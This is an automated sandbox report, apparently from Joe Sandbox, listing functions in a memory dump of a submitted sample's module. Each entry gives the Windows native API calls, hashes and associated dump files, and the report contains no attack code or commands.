Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CloseInitializeOpenQueryThunkValue
String ID:
API String ID: 1662772854-0
Opcode ID: aeff478c386125744e814af2558cd3af4e6df99fd00b1b95ba9e94787ce89ab0
Instruction ID: 0f7341ef9ff8319825b065b45791003b2d0cda74c3c76676ecce832ba1096283
Opcode Fuzzy Hash: aeff478c386125744e814af2558cd3af4e6df99fd00b1b95ba9e94787ce89ab0
Instruction Fuzzy Hash: F921C571F0021A9BDB16DA9DC991B9FBBB9EF88314F15412BD901E7285EA309C41C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 726CA27C, Relevance: 4.6, APIs: 3, Instructions: 72memorynativeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00001007,?,7273B2E8,00000000,?,?,726BBB07,00000003,?,00000000,00000000,00000000,00000001,?,00000000), ref: 726CA2BC
ZwQueryVirtualMemory.210A(000000FF,00000000,00000004,00000000,00001007,00000000,?,00001007,?,7273B2E8,00000000,?,?,726BBB07,00000003,?), ref: 726CA2F1
RtlFreeHeap.210A(00000000,00000000,000000FF,00000000,00000004,00000000,00001007,00000000,?,00001007,?,7273B2E8,00000000,?,?,726BBB07), ref: 726CA320

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$AllocateFreeMemoryQueryVirtual
String ID:
API String ID: 549756978-0
Opcode ID: c8dd70af1f2839e3de6faa82add5e2585bd9b96416263ebc502e609875a278db
Instruction ID: b2fd487864eaa753f03d4990f50ba0c7dc26b1d61b6b0f6360854e3369001cb1
Opcode Fuzzy Hash: c8dd70af1f2839e3de6faa82add5e2585bd9b96416263ebc502e609875a278db
Instruction Fuzzy Hash: 58115C727401212BD3165A2CCC11BB67269DB81714F250A3AFA1ADB3C0D765EC81C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 726FB7FA, Relevance: 4.6, APIs: 3, Instructions: 64memorynativeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(00000000,00000000,-00000001,00000000,00000020,?,?), ref: 726FB818
ZwAllocateVirtualMemory.210A(000000FF,?,00000000,?,00001000,00000004,00000000,-00000001,00000000,00000020,?,?), ref: 726FB868
RtlReleaseSRWLockExclusive.210A(00000000,00000000,-00000001,00000000,00000020,?,?), ref: 726FB88D

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireAllocateMemoryReleaseVirtual
String ID:
API String ID: 1696613717-0
Opcode ID: 41ea1b27a64dbc07f8ef3ca2e2bf37aa2610feb828eb411962d74a9b478cbb89
Instruction ID: 3db7a47722b836d7b9243ec8be7f88327ca271fd5574d13e2fef4f1dea3009be
Opcode Fuzzy Hash: 41ea1b27a64dbc07f8ef3ca2e2bf37aa2610feb828eb411962d74a9b478cbb89
Instruction Fuzzy Hash: 3211E675E00349AFDB10CE99C880BDEBBF9EF89314F18456AEA61D3380C275E9458B90

Uniqueness

Uniqueness Score: -1.00%

Function 726D6105, Relevance: 4.6, APIs: 3, Instructions: 62nativeCOMMON

Download Yara Rule

APIs

memset.210A(?,00000000,00000030,00000000,00000000,00000000), ref: 726D6133
memcpy.210A(?,?,00000000,00000000,00000000,00000000), ref: 726D6166
ZwTraceEvent.210A(?,00000100,00000030,?,?,?,?,00000000,00000000,00000000), ref: 726D61A2

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: EventTracememcpymemset
String ID:
API String ID: 2169877366-0
Opcode ID: c85fbcaad1d493bf5daf226fe4daa8c9f3558b3e8e2e3bd8ad8371a9991b304f
Instruction ID: bfbb670e5936420e2b42ad1c38683bb763788299e385b4e78a73bdd56be69748
Opcode Fuzzy Hash: c85fbcaad1d493bf5daf226fe4daa8c9f3558b3e8e2e3bd8ad8371a9991b304f
Instruction Fuzzy Hash: 521104316047455BD711DF589C81BABB7A8EF84300F00092EF9948B2D0D775DA19C7D6

Uniqueness

Uniqueness Score: -1.00%

Function 726C40A7, Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000000,00000030,?,00000000,?,726AFCC1,?,00000001,00000001,?), ref: 726C40CB
memcpy.210A(00000000,00000000,00000000,00000001,?,00000000,00000030,?,00000000,?,726AFCC1,?,00000001,00000001,?), ref: 726C40F4
RtlFreeHeap.210A(?,00000000,00000000,00000030,?,00000000,?,726AFCC1,?,00000001,00000001,?), ref: 726C4125

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$AllocateFreememcpy
String ID:
API String ID: 4030768257-0
Opcode ID: de69ba2a4303351f14e6a91f7475e59ae6e73f744cd534b91540111e547a2a50
Instruction ID: 088eaf615a4c3baf3d20d3a85930577a0ffd73c5883958dd84a8e731809d34a7
Opcode Fuzzy Hash: de69ba2a4303351f14e6a91f7475e59ae6e73f744cd534b91540111e547a2a50
Instruction Fuzzy Hash: BD11E572504248BFCB169F5CD8809BEBBBAEF95310F10806EF984C7390DA319D55D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 726D113A, Relevance: 4.6, APIs: 3, Instructions: 58nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ZwQueryWnfStateNameInformation.210A(7262FBE4,00000001,00000000,00000568,00000004,?,?,00000000,?,?,?,?,726D0FE3,?,00000568), ref: 726D1158
ZwUpdateWnfStateData.210A(7262FBE4,00000000,00000000,00000000,00000000,00000000,00000000,7262FBE4,00000001,00000000,00000568,00000004,?,?,00000000), ref: 726D116D
EtwEventWriteNoRegistration.210A(7262FBEC,?,00000000,00000000,7262FBE4,00000001,00000000,00000568,00000004,?,?,00000000,?,?,?,?), ref: 726D118B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: State$DataEventInformationNameQueryRegistrationUpdateWrite
String ID:
API String ID: 4159075219-0
Opcode ID: d11daa218fd11251ddf2043f886681d78e5059626f5acff9cf89e1bd9b2acbce
Instruction ID: 77402da83f8aacc4efb8ed5dbed3002e7652e6ed188d9f31b98b4402357a9732
Opcode Fuzzy Hash: d11daa218fd11251ddf2043f886681d78e5059626f5acff9cf89e1bd9b2acbce
Instruction Fuzzy Hash: 2FF0C2A2A0020D7BEB1098BDCD85FABB6EDDB89659F5006ABEB01D61D0E5A0CC4581E5

Uniqueness

Uniqueness Score: -1.00%

Function 726D12B9, Relevance: 4.6, APIs: 3, Instructions: 56memorynativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ZwAllocateVirtualMemory.210A(000000FF,00000000,00000000,0000000C,00001000,00000004,72720200,0000001C,726D1056), ref: 726D12FA
memset.210A(00000000,00000000,0000000C,000000FF,00000000,00000000,0000000C,00001000,00000004,72720200,0000001C,726D1056), ref: 726D1332
RtlInitializeSid.210A(00000000,?,00000001,72720200,0000001C,726D1056), ref: 726D1342

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateInitializeMemoryVirtualmemset
String ID:
API String ID: 1463077056-0
Opcode ID: fb54399165fa3720d88c45e6116b5f2bc9dad6b24da1e03ed42a94fe0d05805e
Instruction ID: bc1b1685704fe923664baa84c430c62704dd3f49ca7c119f0753a35ea26343b3
Opcode Fuzzy Hash: fb54399165fa3720d88c45e6116b5f2bc9dad6b24da1e03ed42a94fe0d05805e
Instruction Fuzzy Hash: 6E1133B1D0121D9BDF158FA8C840BEEBAB1BF08725F11515AE911BB2C0C7B48941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 726CA32E, Relevance: 4.6, APIs: 3, Instructions: 54nativeCOMMON

Download Yara Rule

APIs

ZwQueryInformationProcess.210A(000000FF,00000059,00000000,00000004,00000000,?,?,00000000,?,?,00000000), ref: 726CA363
ZwMapViewOfSection.210A(00000000,000000FF,?,00000000,00000000,00000000,?,00000001,00040000,00000002,000000FF,00000059,00000000,00000004,00000000,?), ref: 726CA387
ZwClose.210A(00000000,00000000,000000FF,?,00000000,00000000,00000000,?,00000001,00040000,00000002,000000FF,00000059,00000000,00000004,00000000), ref: 726CA39B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CloseInformationProcessQuerySectionView
String ID:
API String ID: 3244804911-0
Opcode ID: 3f7f84577f315dcef08f998ef42bdbe7534b8173eedf91f20582cd0f8c0d8dee
Instruction ID: b2368b2e57c0cceeed01c02fa87130615020f22b3e163ede15d18e1c2f19e804
Opcode Fuzzy Hash: 3f7f84577f315dcef08f998ef42bdbe7534b8173eedf91f20582cd0f8c0d8dee
Instruction Fuzzy Hash: C6014072900218BFDB109E9DCC81E9EBBBCEB45764F600266BA18E72D0D670EE409794

Uniqueness

Uniqueness Score: -1.00%

Function 7270145F, Relevance: 4.6, APIs: 3, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

memset.210A(?,00000000,00000034,?,-0000004D,?,?,?,?,?,?,?,?,?,?,?), ref: 7270147F
RtlGetCurrentServiceSessionId.210A(?,?,-0000004D,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 727014A8
ZwTraceEvent.210A(?,00020402,00000014,?,-0000004D,?,?,?,?,?,?,?,?,?,?,?), ref: 727014D7

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTracememset
String ID:
API String ID: 4204234202-0
Opcode ID: 1baf88103dfc6824ada7fa77bd050b712f729d8b5dea3c4ad7af1a629db587b1
Instruction ID: d01779f066df471e9fc7b9453a87be260fa38179ca1e9344c3ede24d617943fd
Opcode Fuzzy Hash: 1baf88103dfc6824ada7fa77bd050b712f729d8b5dea3c4ad7af1a629db587b1
Instruction Fuzzy Hash: D9116D71A01249ABCB10DFADD945EAEBBF8EF44710F10446AF914EB380DA74DA05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 72701243, Relevance: 4.5, APIs: 3, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

memset.210A(00000001,00000000,00000030,?,00000000,00000001,?,?,?,00800001,00000000,-00000001,?,00800001,00002001,?), ref: 72701263
RtlGetCurrentServiceSessionId.210A(?,?,00000000,00000001,?,?,?,00800001,00000000,-00000001,?,00800001,00002001,?), ref: 72701286
ZwTraceEvent.210A(?,00020402,00000010,00000001,?,?,00000000,00000001,?,?,?,00800001,00000000,-00000001,?,00800001), ref: 727012B3

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTracememset
String ID:
API String ID: 4204234202-0
Opcode ID: f8591355c4bd63260ab934dbc5fe2144ee385580c2fbb6e6bbf2fa4de60ef626
Instruction ID: 958c456d503148bcff2755cd9719f9c9d6f60930e873ec36f4bbf88b00fe81ba
Opcode Fuzzy Hash: f8591355c4bd63260ab934dbc5fe2144ee385580c2fbb6e6bbf2fa4de60ef626
Instruction Fuzzy Hash: 91019E71A01248ABCB14DFADD945EAFBBB8EF44710F00406AF800EB380EA74DE00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 727013D8, Relevance: 4.5, APIs: 3, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

memset.210A(?,00000000,00000030,?,?), ref: 727013F8
RtlGetCurrentServiceSessionId.210A(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 7270141B
ZwTraceEvent.210A(?,00020402,00000010,?,?,?,?), ref: 72701448

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTracememset
String ID:
API String ID: 4204234202-0
Opcode ID: 10e1385402c9bf7b028d925c04bb9eba495f6240b287f011265dc62b95c1b15c
Instruction ID: b15032a8e9d55ace32f2258a82c1cbbf5f949eebddfaa6f754188bab773a3347
Opcode Fuzzy Hash: 10e1385402c9bf7b028d925c04bb9eba495f6240b287f011265dc62b95c1b15c
Instruction Fuzzy Hash: 1E014C71A41248ABCB14DFA9D945AAEBBB8EF44710F50406AB900AB280EA749E15CB95

Uniqueness

Uniqueness Score: -1.00%

Function 72647090, Relevance: 4.5, APIs: 3, Instructions: 48memorynativeCOMMON

Download Yara Rule

APIs

ZwClose.210A(?,7FFFFFFF,72692500,?,72647066,7FFFFFFF,?,?,?,?,726D3CFE,?,727202C0,00000008,72671C00,?), ref: 726470DA
RtlFreeHeap.210A(?,00000000,7FFFFFFF,7FFFFFFF,72692500,?,72647066,7FFFFFFF,?,?,?,?,726D3CFE,?,727202C0,00000008), ref: 726470F6

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CloseFreeHeap
String ID:
API String ID: 1266433183-0
Opcode ID: 0d12de3e83155ac6db62e353217ca77629fd3257eadfb2e287d584cd5f229cf7
Instruction ID: 3dc795be5ac6b3536422a665ebec6f75fca78cb6ac17cc03040ee0c011186bd8
Opcode Fuzzy Hash: 0d12de3e83155ac6db62e353217ca77629fd3257eadfb2e287d584cd5f229cf7
Instruction Fuzzy Hash: B2118EB2501A81CFD3228E09C880B12B7E6BF50B62F15846AD48A4B4E6CB74F981CB10

Uniqueness

Uniqueness Score: -1.00%

Function 726CA146, Relevance: 4.5, APIs: 3, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

ZwGetCachedSigningLevel.210A(000000FF,00000000,000000A4,00000000,00000000,00000000,00000000,000000FF,?,000000FF,?,726CA205,00000024,?,00000000), ref: 726CA167
ZwCompareSigningLevels.210A(?,0000000C,000000FF,00000000,000000A4,00000000,00000000,00000000,00000000,000000FF,?,000000FF,?,726CA205,00000024), ref: 726CA178
ZwSetCachedSigningLevel.210A(00000004,0000000C,00000024,00000001,00000024,000000FF,00000000,000000A4,00000000,00000000,00000000,00000000,000000FF,?,000000FF), ref: 726CA18E

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Signing$CachedLevel$CompareLevels
String ID:
API String ID: 116296760-0
Opcode ID: 2ca2801cacbf8dc70d2d4c72d0c6fccde1669e29ac2b5e4b4c7bf35137a4d077
Instruction ID: 4dfc0013813d0c79baaea939b7c9783d754b1c77067da4fe9580aae86e440df3
Opcode Fuzzy Hash: 2ca2801cacbf8dc70d2d4c72d0c6fccde1669e29ac2b5e4b4c7bf35137a4d077
Instruction Fuzzy Hash: 69018671601395BAE7225B698C40FABBFADDF45720F040657BE04EB281E671DD5083B1

Uniqueness

Uniqueness Score: -1.00%

Function 726480C0, Relevance: 4.5, APIs: 3, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(?), ref: 726480D1
RtlReleaseSRWLockExclusive.210A(?,?), ref: 726480F4
ZwUnlockVirtualMemory.210A(000000FF,?,?,00000001,?), ref: 72648119

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireMemoryReleaseUnlockVirtual
String ID:
API String ID: 136216318-0
Opcode ID: 8ba272dc24d62c2c39b42e0839c0008a29c3ba66b71aab400a3ab2c0a4b7c37e
Instruction ID: 3f2394e622e7fba77cca2bc881857fb7ecec4cc57989d06e7e5a50211123912a
Opcode Fuzzy Hash: 8ba272dc24d62c2c39b42e0839c0008a29c3ba66b71aab400a3ab2c0a4b7c37e
Instruction Fuzzy Hash: 1A01A272A00248ABC720CEADCC40D9BB7BDEB45B60F05565BEA41A7280DA71FE4487E4

Uniqueness

Uniqueness Score: -1.00%

Function 726FF752, Relevance: 4.5, APIs: 3, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

memset.210A(7270FB00,00000000,00000030,0000002C,00000000), ref: 726FF772
RtlGetCurrentServiceSessionId.210A(?,0000002C,00000000), ref: 726FF78F
ZwTraceEvent.210A(?,00020402,00000010,7270FB00,?,0000002C,00000000), ref: 726FF7BC

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTracememset
String ID:
API String ID: 4204234202-0
Opcode ID: 54af3b27526ea12b1c045f95e3053e1e5083d8613b27dd62f55c4e26a383cb1c
Instruction ID: ddb4ab8ecbb56ece3a910fce2afe088fa3297df90ba285794beed47badb0f915
Opcode Fuzzy Hash: 54af3b27526ea12b1c045f95e3053e1e5083d8613b27dd62f55c4e26a383cb1c
Instruction Fuzzy Hash: D3018F75E10208ABCB14DFADD845FAEBBB8EF84700F00406BB900EB2D0DA74D911CB99

Uniqueness

Uniqueness Score: -1.00%

Function 72688200, Relevance: 4.5, APIs: 3, Instructions: 42nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 72688284: ZwCreateThreadEx.210A(?,001FFFFF,00000018,?,?,?,?,00000000,00003000,00000004,?,?,00000000,00000000), ref: 72688342

ZwResumeThread.210A(?,00000000,00000001,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,?,?,72688009), ref: 7268822E
ZwTerminateThread.210A(?,00000000,?,00000000,00000001,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,?), ref: 726C033B
ZwClose.210A(?,?,00000000,?,00000000,00000001,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000), ref: 726C0341

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Thread$CloseCreateResumeTerminate
String ID:
API String ID: 2468088422-0
Opcode ID: ce8b6383ca77f53aea5a85acecdcd2d69c977b9330ac16a23816077a6cca7da1
Instruction ID: 95ee1ee519f249e260a409d5ee931a645965da60b6ed49abb020c658cdeab11a
Opcode Fuzzy Hash: ce8b6383ca77f53aea5a85acecdcd2d69c977b9330ac16a23816077a6cca7da1
Instruction Fuzzy Hash: CBF082326004587A97215A9E9D64DEB7E6CDFC6B60F04021BBE15960C0DA71DD12D3F6

Uniqueness

Uniqueness Score: -1.00%

Function 72685651, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(-00000020,00000000,?,?,?,?,72705725,00000000,?,00000000), ref: 72685762

Strings

%Wpr, xrefs: 72685715, 72685741

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentServiceSession
String ID: %Wpr
API String ID: 1007659313-1315951043
Opcode ID: b597b759c07e6bb2c8afc9f61692d73706301766a6bf5952a6f7624e4e3f0e23
Instruction ID: 152990cfd2c7e963e6f7d3db839838ae0a371e8d22401f89f14a29b0cb2ec31d
Opcode Fuzzy Hash: b597b759c07e6bb2c8afc9f61692d73706301766a6bf5952a6f7624e4e3f0e23
Instruction Fuzzy Hash: F5514B79A00215CFCB15CF58C580AADF7F6FF84714F2581AAD816A7394D730AE82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 7267242B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

ZwQueryVirtualMemory.210A(000000FF,?,00000003,~tdr fsr,00000014,00000000,?,?,?,7264747E,72736620), ref: 726B4201

Strings

~tdr fsr, xrefs: 726B41F8, 726B41FB

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID: ~tdr fsr
API String ID: 2850889275-2195289241
Opcode ID: 857fa0706232648a163e5d9cbc8cebcbbb0d66e514a35f62c0133a91074455c3
Instruction ID: 4c89a9c7e545a34e1d807773b387b09f9e9a0f93f674b13343df34f8a196103d
Opcode Fuzzy Hash: 857fa0706232648a163e5d9cbc8cebcbbb0d66e514a35f62c0133a91074455c3
Instruction Fuzzy Hash: B8F0C872B4022527E711519DDD06FA776B99B80B28F240237EF55F61C1E6B19D0182E5

Uniqueness

Uniqueness Score: -1.00%

Function 7267A675, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.210A(?,00000000,00000000,00000000,726769A5,00000000,?,?,726768FA,00000000,00000000,?,00000000,?,?), ref: 7267A6AC

Part of subcall function 7265F010: RtlAcquireSRWLockExclusive.210A(00000180,00000180,00000000,00000000,00000180,?,726FB6F6,?,00000000,?,00000000,00000000,00000000), ref: 7265F02E
Part of subcall function 7265F010: RtlReleaseSRWLockExclusive.210A(00000180,00000180,00000180,00000000,00000000,00000180,?,726FB6F6,?,00000000,?,00000000,00000000,00000000), ref: 7265F041

Strings

gsr, xrefs: 7267A684

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireFreeHeapRelease
String ID: gsr
API String ID: 3645524765-3705595638
Opcode ID: 0f73638ff1605d0a8b53e4ce20f40326cea0c3834fc6eaff81b4b912c92e95fb
Instruction ID: 59df22959a42b189e25e203369880687ec42727b3d126fe80de9e9f026e85137
Opcode Fuzzy Hash: 0f73638ff1605d0a8b53e4ce20f40326cea0c3834fc6eaff81b4b912c92e95fb
